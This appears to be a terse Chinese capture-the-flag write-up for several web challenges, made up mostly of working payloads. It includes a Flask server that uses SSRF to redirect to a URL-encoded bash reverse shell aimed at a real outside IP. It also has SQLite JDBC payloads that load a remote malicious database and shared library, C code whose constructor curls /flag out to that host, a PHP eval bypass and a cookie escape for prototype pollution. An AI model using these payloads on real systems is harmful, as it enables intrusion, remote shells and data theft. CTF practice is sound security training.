cms
系统API里面有qrcode
传参数ssrf打flag.php
rev多了个验证
from flask import Flask, redirect, send_from_directory
app = Flask(__name__)
flag = 0
@app.route('/')
def example_redirect():
global flag
if flag != 0:
return redirect('http://127.0.0.1/flag.php?cmd=%62%61%73%68%20%2d%63%20%27%65%78%65%63%20%62%61%73%68%20%2d%69%20%26%3e%2f%64%65%76%2f%74%63%70%2f%31%36%35%2e%31%35%34%2e%35%2e%32%32%31%2f%39%39%39%39%20%3c%26%31%27', code=302)
else:
flag += 1
res = send_from_directory('.', '1.png')
res.headers['Content-Type'] = 'image/png'
return res
if __name__ == "__main__":
app.run(host='0.0.0.0',debug=True)
java
{"type":"3","url":"jdbc:sqlite::resource:http://165.154.5.221:8888/evil.db",
"tableName":"trigger_action_table"}
{"type":"3","url":"jdbc:sqlite::resource:http://165.154.5.221:8888/hack.so"}
编一个so文件
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
__attribute__ ((__constructor__)) void preload (void)
{
system("curl 165.154.5.221:9999?flag=`cat /flag`");
}
利用sqlite的jdbc漏洞
利用CREATE VIEW劫持select方法,在select 执行固定的语句的时候被劫持成
load_extension()
php
php -r eval\(hex2bin\(substr\('_6c73',1\)\)\)\;
或者也可以用竞争
sanic
python原型链
首先设置cookie
分号用adm\073n
\073绕过